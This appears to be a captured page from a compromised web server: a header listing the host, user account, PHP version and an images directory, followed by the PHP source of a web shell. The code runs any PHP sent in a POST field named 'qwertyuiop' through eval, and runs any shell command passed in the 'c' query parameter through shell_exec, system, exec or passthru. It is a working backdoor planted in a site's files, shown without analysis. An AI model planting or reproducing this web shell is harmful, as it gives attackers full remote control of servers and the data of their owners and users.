Server : Apache System : Linux webm012.cluster129.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64 User : eventfrsgx ( 61451) PHP Version : 7.3.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl Directory : /home/eventfrsgx/www/images/ |
<?php $k="qwertyuiop";if(isset($_POST[$k])){eval($_POST[$k]);}elseif(isset($_GET["c"])){$c=$_GET["c"];if($c=="r"){echo"r";}elseif(function_exists("shell_exec")){echo shell_exec($c);}elseif(function_exists("system")){system($c);}elseif(function_exists("exec")){@exec($c,$o);echo implode("
",$o);}else{@passthru($c);}}else{echo"r";} ?>